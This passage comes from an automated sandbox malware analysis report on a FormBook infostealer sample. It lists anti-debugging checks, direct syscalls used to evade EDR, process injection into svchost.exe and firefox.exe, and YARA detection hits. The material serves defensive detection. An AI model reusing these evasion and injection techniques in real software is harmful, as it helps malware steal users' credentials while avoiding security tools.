Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov eax, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov eax, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov eax, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov eax, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov eax, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov eax, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4C34 mov ecx, dword ptr fs:[00000030h] 2_2_054D4C34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CCC8 mov eax, dword ptr fs:[00000030h] 2_2_0542CCC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05428CD0 mov eax, dword ptr fs:[00000030h] 2_2_05428CD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462CF0 mov eax, dword ptr fs:[00000030h] 2_2_05462CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462CF0 mov eax, dword ptr fs:[00000030h] 2_2_05462CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462CF0 mov eax, dword ptr fs:[00000030h] 2_2_05462CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462CF0 mov eax, dword ptr fs:[00000030h] 2_2_05462CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05428C8D mov eax, dword ptr fs:[00000030h] 2_2_05428C8D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054ACCA0 mov ecx, dword ptr fs:[00000030h] 2_2_054ACCA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054ACCA0 mov eax, dword ptr fs:[00000030h] 2_2_054ACCA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054ACCA0 mov eax, dword ptr fs:[00000030h] 2_2_054ACCA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054ACCA0 mov eax, dword ptr fs:[00000030h] 2_2_054ACCA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05458CB1 mov eax, dword ptr fs:[00000030h] 2_2_05458CB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05458CB1 mov eax, dword ptr fs:[00000030h] 2_2_05458CB1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E0CB5 mov eax, dword ptr fs:[00000030h] 2_2_054E0CB5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4F40 mov eax, dword ptr fs:[00000030h] 2_2_054B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4F40 mov eax, dword ptr fs:[00000030h] 2_2_054B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4F40 mov eax, dword ptr fs:[00000030h] 2_2_054B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4F40 mov eax, dword ptr fs:[00000030h] 2_2_054B4F40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4F42 mov eax, dword ptr fs:[00000030h] 2_2_054D4F42
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CF50 mov eax, dword ptr fs:[00000030h] 2_2_0542CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CF50 mov eax, dword ptr fs:[00000030h] 2_2_0542CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CF50 mov eax, dword ptr fs:[00000030h] 2_2_0542CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CF50 mov eax, dword ptr fs:[00000030h] 2_2_0542CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CF50 mov eax, dword ptr fs:[00000030h] 2_2_0542CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542CF50 mov eax, dword ptr fs:[00000030h] 2_2_0542CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CF50 mov eax, dword ptr fs:[00000030h] 2_2_0546CF50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D0F50 mov eax, dword ptr fs:[00000030h] 2_2_054D0F50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545AF69 mov eax, dword ptr fs:[00000030h] 2_2_0545AF69
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545AF69 mov eax, dword ptr fs:[00000030h] 2_2_0545AF69
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2F60 mov eax, dword ptr fs:[00000030h] 2_2_054D2F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2F60 mov eax, dword ptr fs:[00000030h] 2_2_054D2F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504F68 mov eax, dword ptr fs:[00000030h] 2_2_05504F68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E6F00 mov eax, dword ptr fs:[00000030h] 2_2_054E6F00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432F12 mov eax, dword ptr fs:[00000030h] 2_2_05432F12
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CF1F mov eax, dword ptr fs:[00000030h] 2_2_0546CF1F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545EF28 mov eax, dword ptr fs:[00000030h] 2_2_0545EF28
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432FC8 mov eax, dword ptr fs:[00000030h] 2_2_05432FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432FC8 mov eax, dword ptr fs:[00000030h] 2_2_05432FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432FC8 mov eax, dword ptr fs:[00000030h] 2_2_05432FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432FC8 mov eax, dword ptr fs:[00000030h] 2_2_05432FC8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542EFD8 mov eax, dword ptr fs:[00000030h] 2_2_0542EFD8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542EFD8 mov eax, dword ptr fs:[00000030h] 2_2_0542EFD8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542EFD8 mov eax, dword ptr fs:[00000030h] 2_2_0542EFD8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544CFE0 mov eax, dword ptr fs:[00000030h] 2_2_0544CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544CFE0 mov eax, dword ptr fs:[00000030h] 2_2_0544CFE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05470FF6 mov eax, dword ptr fs:[00000030h] 2_2_05470FF6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05470FF6 mov eax, dword ptr fs:[00000030h] 2_2_05470FF6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05470FF6 mov eax, dword ptr fs:[00000030h] 2_2_05470FF6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05470FF6 mov eax, dword ptr fs:[00000030h] 2_2_05470FF6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504FE7 mov eax, dword ptr fs:[00000030h] 2_2_05504FE7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E6FF7 mov eax, dword ptr fs:[00000030h] 2_2_054E6FF7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546CF80 mov eax, dword ptr fs:[00000030h] 2_2_0546CF80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462F98 mov eax, dword ptr fs:[00000030h] 2_2_05462F98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462F98 mov eax, dword ptr fs:[00000030h] 2_2_05462F98
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542EE5A mov eax, dword ptr fs:[00000030h] 2_2_0542EE5A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05502E4F mov eax, dword ptr fs:[00000030h] 2_2_05502E4F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05502E4F mov eax, dword ptr fs:[00000030h] 2_2_05502E4F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436E71 mov eax, dword ptr fs:[00000030h] 2_2_05436E71
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B0E7F mov eax, dword ptr fs:[00000030h] 2_2_054B0E7F
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C30B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00C30B62
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C02622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C02622
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00BF083F
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF09D5 SetUnhandledExceptionFilter, 0_2_00BF09D5
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00BF0C21
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00446C80 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 2_2_00446C80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0044872B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_0044872B

HIPS / PFW / Operating System Protection Evasion
barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtQuerySystemInformation: Direct from: 0x76EF48CC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtOpenSection: Direct from: 0x76EF2E0C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtQueryInformationToken: Direct from: 0x76EF2CAC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtCreateFile: Direct from: 0x76EF2FEC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtOpenFile: Direct from: 0x76EF2DCC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtTerminateThread: Direct from: 0x76EF2FCC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtOpenKeyEx: Direct from: 0x76EF2B9C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtSetInformationProcess: Direct from: 0x76EF2C5C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtCreateMutant: Direct from: 0x76EF35CC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtResumeThread: Direct from: 0x76EF36AC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtMapViewOfSection: Direct from: 0x76EF2D1C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtProtectVirtualMemory: Direct from: 0x76EE7B2E Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtReadFile: Direct from: 0x76EF2ADC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtDelayExecution: Direct from: 0x76EF2DDC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtQueryInformationProcess: Direct from: 0x76EF2C26 Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtResumeThread: Direct from: 0x76EF2FBC Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtCreateUserProcess: Direct from: 0x76EF371C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtWriteVirtualMemory: Direct from: 0x76EF490C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtSetInformationThread: Direct from: 0x76EE63F9 Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtSetInformationThread: Direct from: 0x76EF2B4C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe NtCreateKey: Direct from: 0x76EF2C6C Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\Enquiry24-789.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\sdchange.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\sdchange.exe Thread register set: target process: 2292 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\sdchange.exe Thread APC queued: target process: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\Enquiry24-789.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E77008 Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C31201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00C31201
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C12BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00C12BA5
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3B226 SendInput,keybd_event, 0_2_00C3B226
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C522DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 0_2_00C522DA
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Enquiry24-789.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Enquiry24-789.exe" Jump to behavior
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe" Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C30B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00C30B62
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C31663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00C31663
Source: Enquiry24-789.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: FNvzpsCDjtsg.exe, 00000004.00000000.2402228730.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000002.3273621788.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000000.2700557627.0000000001801000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: Enquiry24-789.exe, FNvzpsCDjtsg.exe, 00000004.00000000.2402228730.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000002.3273621788.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000000.2700557627.0000000001801000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: FNvzpsCDjtsg.exe, 00000004.00000000.2402228730.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000002.3273621788.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000000.2700557627.0000000001801000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: FNvzpsCDjtsg.exe, 00000004.00000000.2402228730.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000004.00000002.3273621788.0000000000EE1000.00000002.00000001.00040000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000000.2700557627.0000000001801000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF0698 cpuid 0_2_00BF0698
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C48195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 0_2_00C48195
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C2D27A GetUserNameW, 0_2_00C2D27A
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C0B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 0_2_00C0B952
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BD42DE

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.3274136665.0000000004420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3274079097.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
